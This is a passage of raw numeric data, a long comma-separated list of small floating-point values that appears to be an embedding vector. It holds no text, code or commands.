01613148,0.005768833,0.0070563345,0.00034587056,0.021937622,-0.0125463065,-0.036447834,-0.0038187022,-0.013369566,-0.033181313,-0.019559244,0.016395077,-0.0075593283,0.0039371788,-0.00080764084,0.0059836707,-0.009456522,-0.017314276,0.005378229,-0.036243167,-0.007357816,0.015872361,0.0022962673,0.027480759,-0.016070073,0.0035991678,-0.0063015334,-0.013834541,-0.01128444,0.008036853,0.01218256,-0.035874054,-0.0018718585,0.010038021,-0.01847669,0.027994636,-0.022203803,0.01565384,0.012937606,0.044250228,0.0011114605,0.009248999,-0.010813491,0.0032924174,-0.016948896,0.008753061,0.004349163,0.027090369,0.024579355,0.008871561,0.0029174844,0.025144551,-0.0032484264,-0.023745326,0.014134913,0.017579468,0.043096505,-0.009891667,0.017722968,-0.010495106,0.023816343,0.0048126862,0.012201395,0.014243225,0.024690075,0.014156658,0.021165732,0.015841207,-0.023101652,0.0029632072,-0.021787629,-0.017333118,-0.0061323224,0.017185127,0.018450487,0.023889834,-0.006440731,0.008268955,0.01928004,0.011398498,-0.001588263,-0.037563764,-0.008986593,-0.026823882,0.000050167313,-0.023145434,0.005897036,-0.035188694,-0.012025161,0.026619827,0.011071783,0.004333236,-0.009148593,-0.001180725,0.012392181,-0.0020172016,-0.04591878,-0.015433685,0.0033403258,0.026676526,-0.014471652,-0.012255575,0.007083207,-0.009539512,0.009264235,0.0040098727,-0.027181884,-0.014490753,-0.007953721,-0.019390618,0.010617203,0.024510069,0.0007779016,0.006978728,-0.019786453,-0.01757632,-0.005299877,0.006487837,-0.003703703,-0.01415423,0.0034942727,-0.0069229957,0.008045064,-0.0012126269,-0.0037356769,0.011079499,0.021022534,-0.03171972,0.012449962,0.0030586456,0.017122852,-0.018882578,0.006898548,-0.0069730207,0.037355635,0.009743211,-0.002326631,0.014447408,-0.019607149,0.008007262,0.029374203,0.030728946,0.0034447869,-0.027102927,0.0045310366,0.0028081073,-0.031230446,-0.013267785,-0.0022959656,-0.0046738232,-0.020411504,-0.027371088,0.009788499,-0.00955063,0.0063623507,0.010108886,-0.032745816,0.046811983,-0.011257706,0.017468007,-0.005761961,-0.009247302,0.006017308,0.006474259,-0.0048665544,-0.024604384,-0.036503326,0.02538015,-0.034905326,0.019554177,0.011606894,-0.031168548,-0.014202897,-0.028861511,0.014813874,-0.015610195,0.019340074,0.010703269,-0.010301386,-0.043352358,0.011821227,-0.012923829,0.027684608,-0.018358056,-0.01625844,-0.0016324434,0.007861657,-0.0037066492,0.020164363,-0.020491062,0.0015051707,0.02033486,-0.019947218,0.01704022,0.0065215076,0.015493044,0.004086817,0.016842963,0.018829407,-0.01627045,0.016225785,-0.01083023,0.0045192274,0.029956684,0.006516698,-0.012924217,-0.003476772,-0.01697529,-0.012125418,-0.027849795,0.005846681,-0.010053451,0.03008918,0.026069121,-0.01478314,0.003942297,0.01474294,0.020452186,-0.007064219,-0.0032968493,0.019545594,-0.011517408,-0.02577919,-0.018128514,0.0021774622,-0.014905064,-0.015753586,0.019889416,-0.0052717375,0.009388145,0.026090948,0.004044762,0.0011656741,0.01739665,-0.011087008,-0.00061766995,0.030181102,0.0051773046,-0.0129336715,0.012504909,0.0337846,-0.035368603,-0.0025350903,-0.00421499,-0.016990826,0.0109398775,-0.025055787,-0.0007561841,-0.012322015,0.014852658,0.008402313,-0.015931599,-0.012563169,-0.011686483,0.015597739,-0.007520944,0.00045555536,0.022462783,-0.00036885313,-0.0031076476,0.019981215,-0.008932042,-0.011778651,0.01868437,-0.008390687,0.0008248199,0.027937848,-0.0005584766,-0.01403148,0.004819502,0.0033305218,0.00033694287,0.02179578,-0.010626675,0.009606099,-0.010205835,-0.0033244689,0.0010244016,0.003072108,-0.030830896,-0.018338464,0.011240204,0.023729831,-0.0047992277,-0.019823747,-0.015673636,-0.065281585,0.0026602794,-0.008051084,-0.019149598,0.0094495695,0.006036023,0.0077139223,0.010018196,0.036309294,-0.020897409,0.0032269459,-0.003934487,0.02188801,-0.0064679873,0.004150054,-0.0052505317,-0.0076166615,-0.00065891107,0.010434811,0.015586061,-0.021740066,0.011198722,0.003294872,0.012617942,0.0419157,0.0064930418,-0.008861132,-0.030299798,-0.017552845,-0.005966847,-0.000530611,0.02084798,-0.019965716,-0.0043885997,-0.018723784,0.011964547,0.024677597,0.006502326,-0.009744732,-0.003107412,-0.012029593,-0.008096783,0.01060879,0.04838584,0.009414735,-0.021063525,0.014055995,-0.0027008818,0.010948605,0.006850471,0.009524176,-0.01636417,-0.017568234,0.019683935,-0.008126635,0.022912122,-0.009383399,0.004868404,0.010211084,0.013814125,-0.014258047,0.008918294,0.019462623,0.03106464,-0.014397299,-0.022629246,-0.008612172,0.025105663,-0.009601996,-0.0072375503,-0.016212154,-0.021354206,-0.011923016,0.0065531675,-0.011079066,0.037093766,-0.009308005,-0.0047777803,0.0013545278,-0.02267524,-0.0077114836,0.0021572474,-0.033443395,-0.001604074,-0.02932911,-0.009964194,0.006701731,0.0034968904,-0.0112620415,-0.0005390556,-0.01501287,0.009430886,0.012441747,0.02812717,-0.011893798,0.02631232,0.0064540044,-0.0064687966,0.005279575,0.0030851744,0.010790525,0.0038986371,-0.012530667,0.025961487,0.019193633,0.00095710316,0.015887491,0.002817589,0.032673907,0.022823522,-0.022053711,-0.023952812,-0.010169574,0.0034837236,0.020016985,0.0039700004,-0.015681852,0.0255981,0.04784037,0.022694632,0.018028807,-0.0075535816,0.012535576,-0.0080654295,0.013838865,0.010194963,0.024149267,0.012635893,-0.013126514,0.012771414,-0.008195857,0.0018168514,0.0023533104,-0.0054390347,0.009745276,0.003469311,0.012586004,-0.017421352,-0.013431023,0.0023133382,-0.019916749,0.000881297,0.005194901,0.012164596,0.022797171,-0.015942028,0.009133719,0.0043744263,0.015063552,0.006650869,-0.004195431,0.01927398,0.02177296,0.02393327,0.007533214,-0.0049677207,0.0064067743,-0.03386016,0.003831165,-0.004136743,-0.011482839,-0.019425554,-0.012410119,0.01162275,-0.0214139,0.004688875,-0.010478312,-0.0032265696,-0.019136485,0.0043805675,0.014786279,0.029717218,-0.013939975,0.022253146,-0.009995035,-0.030835528,0.02537317,-0.00029993028,0.027539302,0.0030808793,0.014046609,0.024731928,0.017534759,0.0042229323,0.02195527,-0.016404176,-0.0023530996,-0.009350382,-0.016738558,-0.014329533,-0.014645033,0.010738154,0.012688984,-0.0017157573,-0.018726865,0.030351488,-0.016821887,0.014714551,0.006206477,-0.018933948,-0.0021407087,0.016759165,0.014452734,0.0075609325,-0.014018862,0.019662065,0.020037292,-0.034784693,0.00561999,-0.02308907,-0.015915208,0.0046913167,-0.0151019385,0.015249902,-0.014916115,0.018935047,-0.015798163,-0.00020352626,0.010210571,-0.006575554,0.011888396,0.023124533,0.025593415,0.020052668,-0.0099205645,-0.0075404122,0.0032456263,0.008666619,-0.014954331,0.01141725,0.034023028,-0.004387523,0.0047334717,0.012909169,-0.044603325,-0.0035675825,-0.005750982,-0.00038604016,-0.013334166,0.009405729,0.0016322215,0.001241903,0.007936345,-0.010019324,-0.008768369,0.03753773,0.0060089924,-0.017222483,0.002136689,0.022580033,0.02280887,-0.0106847845,0.011040738,0.005389183,-0.009524761,-0.009549041,-0.020322297,-0.0070284703,-0.00072341016,-0.0074926126,-0.01922296,-0.0110978335,-0.0014910306,-0.016248856,-0.0065047448,-0.015990106,0.0002466986,0.020681601,0.0152370455,-0.011342168,-0.0032468701,0.0022892875,0.0028450214,0.027096057,0.00701336,0.009450734,-0.014375227,-0.020163696,0.014157006,0.01635334,-0.010234342,-0.004582083,0.0041457824,-0.011385969,0.002594793,0.033434782,0.010201477,-0.00406954,0.0014543876,-0.016595582,-0.028530631,-0.00941234,-0.010775108,-0.004826771,0.014239924,0.0129330885,-0.026118662,0.0042284816,-0.027079336,0.006242579,0.06198516,-0.01155023,-0.006307646,0.01945167,0.0041790255,-0.022350617,0.010122189,-0.0030791692,0.0007731395,0.0049590855,-0.024289036,-0.010698002,-0.010348217,-0.014132437,0.018432654,0.006666107,-0.012041961,0.009102251,0.021216309,0.0041738283,0.0037463757,-0.0062634647,0.00982022,-0.014591102,0.013853154,0.01644226,0.013143831,-0.0077846693,0.015928213,0.01950215,0.0054432815,-0.022435067,0.008011912,0.017219622,-0.027694505,0.0027482077,-0.0005667119,0.010622464,-0.0069869687,0.008568713,-0.0013212689,-0.0048639774,0.05731586,0.00072728086,-0.013966007,-0.011723331,-0.016129607,0.0010885353,-0.010382324,-0.008453737,-0.00008656648,-0.0041508684,-0.014359979,0.0062625795,-0.002540935,0.008776414,-0.009401804,0.0126665905,0.032592677,-0.00035047444,-0.0048698788,0.018173682,0.00017572271,-0.012026916,-0.014158347,0.0052500926,0.004996567,-0.02453454,0.03488858,-0.01677127,0.009590945,-0.0015741311,-0.022088382,0.009604254,-0.021331545,-0.017298087,0.0078062555,0.0027903079,-0.02623525,-0.020596547,-0.022219678,0.00613587,0.031867325,0.024938721,-0.02977288,0.005798006,0.011680036,0.0021358086,0.06519322,0.018129626,0.0062223603,-0.0064654597,0.0022983493,0.007002355,-0.0033609516,0.019749671,-0.023836695,0.01270822,-0.026339205,0.02684987,0.009061763,0.006306361,0.016673956,-0.008979993,0.0096523035,0.01286385,-0.00058251794,-0.008317224,0.0075339647,0.035637133,-0.0027303563,-0.009540578,-0.012092027,0.015789611,-0.00041222712,-0.01394983,-0.0037168106,-0.012242493,-0.010222487,0.0011022718,0.014706578,0.0035761748,-0.01188231,-0.063032076,-0.00022936717,0.14509933,-0.000048984348,0.0053579956,-0.0012276756,-0.0036846125,0.010437321,-0.13590369,0.01741777,-0.0029130594,0.0004828252,0.008169582,-0.007752668,-0.0070748758,0.023425994,0.014341719,-0.019578261,0.0032545906,-0.023171403,0.019212002,-0.013303901,-0.0015129771,0.0068231625,-0.0137590375,0.006953053,-0.015876235,0.0023542084,-0.0024703196,-0.0076266257,0.00538822,-0.018855996,-0.014538889,0.014610152,0.016482875,-0.0074112625,-0.028240783,0.012934419,0.02197862,-0.0038621575,-0.029292678,-0.01187035,0.046723492,0.0042382693,-0.015591172,-0.0011234485,-0.1579132,0.00628905,0.013806082,-0.027875323,0.026746295,-0.009270321,-0.0056237727,0.009067452,0.006478013,-0.034380693,0.0059011863,0.025905596,-0.0048812563,0.011623908,-0.018977348,-0.0069877123,0.0037866165,0.0112719955,0.00015559292,0.0062957145,-0.023127424,-0.0042035608,-0.03116018,-0.0005911987,-0.0025858593,0.01212251,0.0079895565,0.027117204,0.022510193,0.012558505,0.010203104,0.0059285234,-0.031444456,0.01440935,-0.0018163205,0.0073905485,-0.0074167945,0.020425403,-0.005073934,0.009988573,0.0274854,0.005013988,0.001262272,0.0044617653,-0.00413209,0.008810759,0.018903174,0.006474885,0.01151411,0.0066094133,0.026771164,0.007487094,-0.033553783,0.028765773,-0.0008024838,-0.00015854034,-0.0039290106,-0.017536337,-0.011023008,0.014134266,-0.014427343,-0.0037104636,-0.011520232,-0.0025557661,0.053022,-0.0077284975,0.011623275,-0.013631707,0.0034065323,-0.013354703,-0.00022657435,-0.013257176,0.005090324,-0.023380306,0.017535843,0.013704934,0.004763589,0.005291966,0.021945247,-0.013130065,0.011324059,-0.015479272,-0.0027296331,-0.03618406,0.00004970669,-0.0057305233,0.004121329,-0.0047774045,0.014220514,0.005176657,0.036283296,0.0059949914,-0.0021538876,-0.007303266,0.02633749,0.0074261865,0.037487157,-0.010118032,-0.026784524,0.015790997,-0.0010916675,-0.01895279,-0.01579015,0.008789789,-0.015954096,0.022591213,-0.012698766,-0.024704458,-0.014654614,-0.007867189,0.003913501,-0.005379082,0.018878961,-0.008665059,-0.02171654,0.0025767395,0.017203225,-0.01661584,0.0065906346,-0.03473864,-0.025511216,0.010947277,-0.011851374,0.009156012,0.01902409,-0.011985565,-0.015404666,0.0076718675,-0.028256124,0.022663172,-0.009576815,0.015037841,0.0026716117,0.013756271,-0.038833726,0.0002612475,-0.009925336,0.0075286343,-0.02927228,-0.006502781,0.00551261,0.0037314068,-0.022710828,0.006663899,0.024260763,-0.009836867,0.021995775,-0.0020666863,0.009159681,0.006135649,0.016230814,0.0045624566,-0.018565979,-0.016010925,-0.0034492926,0.059488956,-0.009524728,-0.018250663,0.020016184,0.025912065,0.009716503,-0.00023579871,-0.013763095,-0.007868337,0.00054380705,-0.024435237,-0.0068864916,0.012258508,0.01920838,-0.021718888,0.020949,-0.0032618637,0.02237494,0.0026928359,0.013748255,0.016515516,-0.015523375,-0.019989133,0.029408375,0.01444291,-0.00008942722,0.02373968,0.0008730311,0.004057538,-0.0028748193,0.00048561153,-0.0076343874,-0.027500937,0.011567225,0.017070621,-0.037964873,-0.017281031,-0.0025132592,-0.004924209,-0.0025681788,0.007576124,0.0019995712,0.003235454,-0.00979739,0.0017778052,-0.01850353,-0.0076840185,0.024526825,0.0062563648,-0.00350392,0.0061405906,0.0023369303,0.013292666,-0.009369538,-0.0059845964,-0.002244151,-0.009252606,0.0069146096,0.007036169,-0.0044025183,0.040498585,-0.012300826,-0.008156625,0.0030467175,-0.014504197,0.003726444,0.00041270786,0.0013477622,0.013187523,0.014967158,0.0048877904,0.0031518072,-0.029608477,0.006734164,0.015111283,-0.016994877,-0.0082103945,0.012650167,-0.0144916875,0.016024433,0.01810301,0.025521232,-0.001624402,-0.013723404,-0.0069981315,-0.03813336,-0.02309247,0.058647145,-0.024977805,0.00079389743,0.010611167,0.0025178345,0.04726506,0.0074766246,0.0031189008,0.03107857,0.0014001861,0.005524655,0.018903188,0.0004223182,0.019429177,0.014275837,-0.017938504,-0.012815085,0.008718745,-0.01444627,0.0067206738,0.017639058,0.019870114,-0.0057519665,-0.0030136309,-0.0189267,-0.0015378925,-0.030686863,-0.0050444407,0.03678469,-0.006600863,0.0038147427,0.019479109,0.0077193873,-0.019724403,-0.01174351,0.0053976406,-0.010808072,0.04303011,-0.010483422,0.014957913,0.004672972,-0.027798755,-0.0009897302,-0.0046219532,0.025616406,0.02012781,-0.01512648,0.007469515,-0.010024924,0.030431295,-0.019728074,0.012442502,0.018499358,-0.019242348,-0.010399935,-0.0015979635,0.0038360702,-0.01545164,0.01678765,0.0015258952,-0.024332806,-0.027415024,0.016504187,-0.016284037,-0.005442731,-0.00571744,0.0017121421,0.013487893,0.0048940703,-0.013713268,-0.0076910695,-0.023715034,-0.02032565,0.0036257687,0.018724846,0.0027017584,-0.0075912974,-0.025321553,0.008470895,0.021729728,-0.0027089207,0.021040512,0.002037458,0.004051738,-0.01884101,0.010570346,-0.006582863,0.0064355615,-0.004084117,0.0022547566,0.013546141,-0.018213864,-0.031576652,0.015260333,-0.004677152,0.009091286,0.0030276305,0.016492754,0.019007223,0.00053229317,0.025390811,-0.016797125,-0.0024661825,-0.01143472,0.01634776,-0.010394845,-0.021449653,-0.03926495,0.0007151688,0.028736653,-0.023072045,-0.0065850797,0.016614834,0.00052846724,-0.0006981752,-0.014155089,-0.022488607,0.008658972,0.0012909224,-0.015776781,-0.019988017,0.007578199,-0.00728849,-0.019508822,-0.0058801505,-0.027065948,0.021528404,-0.0056492165,0.010157661,-0.011757132,0.0233874,0.025848141,-0.03593672,-0.004288313,-0.0038327565,-0.014690815,-0.0012517226,-0.0061198073,-0.0068872203,-0.015641622,0.03379566,-0.01295112,-0.010604179,-0.018256873,0.037121873,0.0354857,-0.0016302767,0.0037801382,-0.0022358948,-0.030010257,-0.028117228,-0.027676916,-0.0016760711,0.0076911077,-0.04135144,-0.008266712,0.0086767515,-0.016640672,-0.00026322238,0.009965474,0.008314216,-0.0049898834,-0.0070418036,0.012691446,-0.011530496,-0.0014901052,0.0012677846,0.025212854,-0.0099610435,0.0055671427,0.017202383,-0.021678936,-0.03436248,-0.016685322,-0.02294151,-0.004501553,-0.0015034896,-0.045865364,0.001829783,0.02158711,0.04948136,0.017551536,0.012440458,0.023948077,0.012900955,-0.014789516,0.0034526244,0.017567655,-0.025430677,0.0037962564,-0.01900136,-0.0065476303,0.017099477,0.017267317,-0.0091356505,0.02399872,0.0019536868,-0.01948339,-0.0016496107,0.0049247565,0.016427455,-0.002167087,-0.003150439,-0.030861154,0.02192924,0.022082722,-0.027185831,-0.046542745,0.0011012404,-0.02178042,0.005359648,0.0046711667,-0.007953364,0.016534448,0.010620432,-0.016582392,0.010706758,0.010318106,-0.03207199,0.029065015,0.011922963,0.012659868,0.000023387085,-0.014470359,0.01220017,0.001855514,-0.018877815,-0.0031140253,-0.012686229,0.011453081,0.03231887,-0.008042554,0.027387058,0.007709056,0.0048984783,0.00076509727,-0.0069555333,-0.029886896,-0.0035960001,-0.04043964,-0.0071405214,-0.023140933,-0.018492363,0.001256298,-0.0136440005,0.012836434,-0.11619604,-0.0015642964,-0.026006404,0.009077999,-0.010938073,-0.011190576,0.017088184,0.012099139,0.0032313624,-0.011594837,0.00942362,0.024618298,0.0012687632,0.01575001,-0.0022656966,0.00024464694,-0.031253126,-0.013925852,-0.0015848633,0.010614401,0.038984247,-0.0050200326,-0.008712519,-0.007665599,-0.0026871199,-0.008923977,-0.011089576,0.004188585,0.021031382,0.010860603,0.015080102,0.024414843,-0.004381099,0.02177616,0.017373862,0.003051051,0.00096873334,0.003607891,-0.006403169,0.010701046,-0.012275723,0.0019438851,-0.007737821,-0.019095153,0.0105472645,-0.010243464,0.0011947087,0.016405787,0.033148475,0.010832988,0.0036851473,0.0008992976,0.0054759597,-0.000056905283,-0.023027932,-0.010613566,0.009987328,0.00432643,0.019139254,-0.0037317988,0.00439606,0.018382166,0.016001988,-0.009848909,0.020010378,0.011028821,-0.0021368037,0.0022978508,-0.021544954,-0.020502657,0.002899418,0.021222768,-0.0034844358,-0.0032063564,-0.0244116,0.0096747745,-0.0026387149,-0.006507325,-0.022440514,0.02106125,-0.027620824,-0.017638467,0.02174908,0.016045708,-0.0076423935,-0.024950976,-0.003077945,0.0008361366,-0.0067784935,0.007062488,0.022899823,-0.0005005532,-0.0011004126,-0.023717664,-0.00625551,0.0043633156,-0.027666753,0.0064301994,-0.009480823,0.010392119,-0.009181548,-0.015343781,-0.003401086,-0.018466605,-0.12161976,0.0009926285,0.008718546,0.023316657,-0.007582635,-0.02965271,0.0140220765,0.007971333,0.053036585,0.015710711,-0.019742914,-0.0010139729,0.0059077474,-0.001306945,-0.0022327283,0.011413245,-0.017605003,-0.014621348,0.0040321783,0.011642289,0.013793968,-0.03120601,0.0135760205,0.018925058,0.019780371,0.0254322,0.0017038208,0.022594288,0.025382603,-0.010800746,0.0028119478,0.0013613761,0.0016216114,-0.02223912,-0.019110229,-0.0016500144,0.0019488198,-0.003042612,-0.008140006,0.02275907,0.025108086,-0.012343687,0.017378666,0.014579745,0.00042554483,-0.025082996,0.001773421,0.011543321,-0.015677197,-0.014688712,-0.011357156,-0.0024201914,-0.006784611,0.0011294612,-0.00027618176,-0.00648484,0.0072932346,0.0023917812,0.02841802,0.013969035,-0.005569474,-0.00069628214,0.0086037805,0.018759593,0.0149427885,0.020225724,-0.023232462,0.025294315,0.0035703853,0.009596344,-0.0020592378,0.028574895,-0.0050917286,-0.020696085,0.026119906,-0.004839132,-0.0028374956,0.012387122,0.018859372,-0.005697355,0.015377718,-0.030921906,-0.006614811,0.005187366,-0.044637945,0.004047686,0.019291958,-0.0009421829,-0.015406675,0.00796317,0.042984165,0.0031496177,-0.0018934524,0.025394317,0.009170304,-0.013543629,0.03720943,-0.0028304297,-0.01916746,-0.030524172,-0.014370588,-0.031857386,-0.005625736,0.010639982,-0.028687054,0.009050509,0.0342718,-0.0029773603,0.0026937954,0.0016774172,0.0033144099,0.03625715,-0.015752437,0.011465705,0.0141987745,0.008721969,-0.012256743,-0.0008822701,-0.0126403,0.0031399638,0.02284605,0.0012347213,0.00847661,-0.0040609725,-0.012546808,-0.0058895745,-0.005655216,0.035239846,0.018476376,-0.029286377,-0.0025144683,0.020729482,0.0055896714,-0.013674073,0.0016390203,0.0018110953,0.016407927,-0.011478233,0.0032612197,0.0062563214,0.008808005,-0.018064383,-0.0061099757,0.0038416183,-0.01062353,-0.01226562,-0.015295975,-0.007165697,-0.019518971,0.006172146,0.0021002209,-0.0030355433,0.0022931315,0.013187833,0.019624915,0.007550659,-0.021401122,0.00637813,-0.0060064634,0.00057832245,-0.011492106,0.018476436,0.019734303,-0.02337371,-0.022028478,-0.004788863,-0.0114838015,-0.0032240762,-0.004570405,0.0072854487,-0.010690646,0.0028833768,0.009636729,-0.023945555,0.01960064,0.0044483095,-0.0073688966,0.03641058,0.028770195,0.021955369,-0.003358089,0.022146635,-0.018286696,0.0061255614,0.012872287,0.014049764,-0.014143626,-0.018027592,-0.0049450677,-0.015377196,0.03782652,0.0068250103,0.0029967742,-0.020087466,0.0031992204,0.008129725,-0.0017216979,0.0041413675,0.0032052118,-0.007938327,-0.017822558,-0.006861549,-0.0008699102,0.010118155,0.014236825,-0.0074671493,0.0048238747,0.024336413,0.0020713655,-0.009361572,-0.0079501,0.021966629,-0.01942954,-0.009251587,0.011147592,0.020170242,-0.004112112,-0.034127265,-0.020178435,0.012976694,-0.01216236,-0.040743504,0.0019042516,-0.0046421597,-0.0013238266,0.026689269,0.012604528,0.021715254,-0.009124436,-0.0074887653,0.036625966,-0.0046023885,-0.022367533,-0.011698002,0.007631333,0.008852096,0.035665784,0.0061862078,0.0003967243,0.015198004,0.025736429,0.00942521,0.021415168,-0.0018130328,0.014543562,-0.0074331453,-0.0000392524,0.0142847,0.0064526126,0.021801911,0.012451856,0.0026398737,0.00096378074,-0.0032479868,-0.010430621,0.014407194,0.023422852,-0.00042800838,-0.011588834,-0.004175567,-0.022722567,0.014695501,-0.030785952,-0.021553485,0.027061056,0.016912162,-0.01279884,-0.017967703,0.0037339472,-0.0051913033,0.03173282,0.0022280847,-0.007666101,0.008950112,-0.0121451635,0.009386642,-0.0019921677,0.007971216,0.0077131703,0.00015840972,-0.0042802654,0.012825869,0.019823615,0.034030035,0.012342248,0.018820303,-0.011864569,0.016692773,-0.030109297,-0.00065926317,0.009207421,0.0042020436,0.0063460986,0.008862157,0.0058956775,0.007572657,0.004139401,-0.0019476945,0.014858754,0.028788228,0.008422783,-0.013773498,-0.011665807,-0.009001025,0.013592508,-0.012527228,-0.0067934482,0.010023164,0.018245004,-0.00836845,-0.025498908,0.026842583,-0.007099544,-0.007316378,0.013252204,0.0023770768,-0.019754482,-0.00621197,-0.021055665,0.0019572193,-0.0020862645,0.009682921,0.02637749,-0.019350035,0.006303892,0.013529022,0.005423818,0.03784411,-0.0062450888,-0.0053594243,0.0055531124,-0.049249824,-0.005677932,0.005144293,0.016581992,0.0016741697,0.025317905,0.027683986,-0.0052967495,0.028545763,-0.00088236376,-0.0014059595,-0.007129204,0.001330438,-0.0060062767,0.010877273,0.018520601,0.004358011,0.009955906,0.0011786739,0.00012209643,0.000008886614,-0.017220674,-0.004370007,-0.027073761,0.016996175,-0.037683275,0.0015969533,0.012660146,-0.014443407,-0.007820465,0.014103001,-0.021664552,-0.045442075,0.0012101645,-0.023499323,-0.015980976,0.02426626,-0.006004328,-0.005281826,-0.018985286,0.009856127,-0.020710342,-0.016582036,-0.00954525,-0.07859402,-0.022704575,0.0066687246,0.029471459,0.019466909,-0.0037930438,-0.0032293894,-0.009832347,-0.01672944,0.017521247,0.010173138,0.0023367074,-0.0114431465,0.0077383183,0.04010652,-0.021820167,-0.0049167247,0.00825006,-0.0023409622,-0.023352506,0.0049310564,0.004585637,-0.012194512,-0.007507648,0.018354539,-0.00043262888,-0.0057957545,-0.010238718,-0.018852543,0.007882096,0.0018348484,0.0047439476,-0.0031965964,0.0008178477,-0.008585725,0.013217113,-0.005030676,0.03538374,-0.019685397,-0.02516413,-0.0050497795,0.016220456,0.0033440827,0.0023144644,-0.018301217,0.027526528,-0.028602127,-0.016800854,-0.016764322,-0.00034188386,0.019187786,0.01693239,-0.00988535,0.009711509,0.008559513,0.0007623786,0.001388401,0.009322922,0.03045631,0.0069683352,-0.0020061228,0.0074672713,-0.0029859145,-0.012629478,0.001621639,-0.014729689,0.012441643,0.01396101,-0.004738283,0.0013460505,-0.0014129699,-0.01699536,0.0060404744,-0.027986767,-0.013160286,0.0076066754,0.0143045075,-0.006218275,-0.010131834,0.01129098,0.05414612,-0.00079877797,0.014744926,0.0036293191,0.010047074,-0.005897972,-0.016040029,-0.001234831,0.036815632,0.013237428,-0.0166205,-0.0032829943,0.02225692,-0.0020679766,0.016768036,-0.015538796,-0.011994361,-0.002404188,0.0066332403,0.00573701,0.0041133226,0.001795367,-0.0069870516,-0.024082625,-0.0016451175,-0.010813073,-0.0021143628,-0.0063233376,-0.0062209014,-0.011108909,0.0010921732,0.0154122375,0.004401145,0.036697984,-0.0012504631,-0.0003694744,-0.025146103,0.030659487,-0.0025184988,-0.027283669,-0.029171221,-0.02224047,-0.0027660124,0.04201475,0.0287422,-0.0082349405,0.010675107,-0.018655447,-0.007946349,-0.0035972057,-0.008280821,0.013809791,0.021769602,0.005287471,-0.000018200577,0.017753588,-0.0066029276,0.015188268,0.0059904982,0.032030854,0.0037009076,-0.012350333,0.0029836094,-0.0039012362,-0.013650464,0.02546443,0.00483048,-0.008398765,-0.010726741,-0.034593742,-0.0038649817,-0.00642139,0.008016387,0.012773415,0.011844902,-0.0017315276,0.004230041,-0.0005742862,-0.030637816,-0.003130359,0.007731615,0.0115835965,0.016944854,-0.018256553,-0.013479758,0.009739216,0.015150992,0.0068284813,0.011260541,-0.013175628,-0.0040754755,-0.0057549677,0.016521774,-0.0061494135,-0.013851014,-0.0011279134,0.002985813,-0.0023622105,-0.0036248674,-0.0031636234,-0.02433465,0.006326997,-0.0012344787,-0.013770839,-0.006682085,-0.006832333,0.008339651,-0.010519272,-0.004372816,0.0026344203,-0.00055248995,-0.010384474,0.014610425,-0.018024415,-0.008963827,-0.013571927,0.01146435,-0.004462536,0.004794399,-0.0016695058,-0.0026994392,0.00686951,-0.014192434,0.0003122663,0.043015465,0.003765624,-0.0046678726,0.031594582,-0.007681236,-0.0034033223,-0.00353989,0.019007249,0.0173784,0.09915259,-0.00085447414,-0.012463212,-0.010495781,0.021758009,-0.004260682,-0.006152329,-0.011359021,0.0078712525,0.008279238,0.014152819,-0.021956649,0.014449408,-0.013344598,-0.0013624107,0.016917901,0.0055326433,-0.0063496516,0.0066697486,0.001475966,0.0015922057,-0.025030892,-0.01779782,-0.026171727,-0.019725088,-0.03853489,0.029973,0.0492028,-0.0147582,0.029437039,0.00081139995,-0.0046510007,0.00873364,0.014434184,-0.027756473,0.019401867,0.003924088,-0.015544929,0.00024074718,-0.021319646,0.033603188,-0.0014824828,-0.0040643145,0.00019883281,0.007417669,-0.029135104,0.016527547,-0.007668248,-0.0043606884,-0.008256562,0.008183471,0.006398492,-0.009866867,-0.006522594,-0.00036780693,-0.0042962544,-0.008840249,0.015426531,-0.0019111179,-0.010891825,0.00051865034,-0.00494114,0.005104879,-0.026035553,0.0072611417,0.014876091,-0.019198509,-0.0021063876,0.011649983,0.00083481625,0.021789974,-0.006271424,-0.0096933935,0.00046759567,-0.006392373,0.011442469,-0.0036058605,-0.009785044,0.03799182,-0.0036546283,0.005006029,-0.013221424,0.0049012033,-0.01953065,0.014938339,0.0037622286,-0.015009636,0.005498793,-0.0108021125,-0.0133311,-0.028516687,0.015687985,0.029267637,-0.0065223547,-0.015979437,0.013201272,-0.012917253,0.003766754,0.0019086648,0.009699466,-0.027778236,-0.0051824437,-0.01251886,-0.004821909,-0.012425863,0.008775275,-0.0064875116,0.0021699707,-0.010691806,0.0040368605,-0.015051193,0.032461062,-0.00652105,0.011123826,-0.0072005484,0.042444613,-0.028602626,-0.009386806,-0.005810897,-0.01891729,0.0077457656,0.0013860624,-0.00094802567,0.029717334,0.012774301,0.014070278,-0.0024363813,-0.013951601,0.018926132,0.0045553483,0.0068128463,-0.047051053,0.01945033,0.012630554,0.009306104,-0.006185163,0.04358525,-0.0073447614,0.010132441,-0.0059278565,0.011927452,-0.006149205,-0.004245736,-0.013022004,0.012528212,-0.018636554,0.020559909,-0.015476805,-0.008292475,-0.01215355,0.009457231,-0.00050144666,-0.019549957,0.008305739,-0.019485477,-0.013116172,0.019870473,0.011048462,-0.010416257,0.007429223,0.013071498,-0.018096533,0.006517922,-0.043654516,0.024865469,0.0103321085,0.024578858,0.008798433,-0.0008799987,-0.0060206926,-0.028275548,-0.0038599947,-0.02674906,-0.0012375526,-0.018170282,0.003674129,0.00028078322,0.004141163,0.010861601,0.0034603428,0.004454298,0.021182839,-0.0030064257,-0.0098104505,0.03931081,0.010904711,-0.008431331,-0.004602345,-0.018659173,0.038721737,0.015096535,-0.012010272,0.015093615,-0.0041446015,-0.02626198,0.019567598,-0.030611344,0.05287004,-0.01503662,-0.013060516,0.008996521,0.014797739,0.0065864655,-0.028363781,-0.007999674,-0.005141416,-0.010624683,-0.0056370096,-0.006611509,-0.012750343,0.0128222,-0.0036452038,-0.0031571004,-0.03995209,0.022602461,0.007664058,-0.020704625,-0.015469487,-0.02347887,-0.02168969,0.021095628,0.017189765,-0.007944874,-0.012296955,-0.006120233,-0.008145358,0.0063525694,0.022317983,0.012990314,-0.031349503,-0.018278787,0.036414962,0.017307682,0.0039841244,-0.02915821,0.0112251425,0.025947012,0.0076848003,-0.009822947,-0.02034267,-0.029650746,-0.005416658,0.008865896,-0.0029698121,-0.029971983,-0.020991284,-0.02163336,-0.025264177,0.008054965,-0.00930084,-0.029999262,-0.0020030765,-0.015789652,-0.033797644,-0.016691284,-0.006883074,-0.008838882,0.010774799,-0.00841313,-0.01692206,0.010222656,0.0021398207,-0.026442679,0.012575382,-0.011354303,0.00042871892,-0.007855148,-0.0057880683,-0.0015992674,0.007017462,-0.000095964286,0.025005713,-0.013950027,0.025623424,0.025186533,-0.012801068,-0.0034880752,-0.016168,0.018459955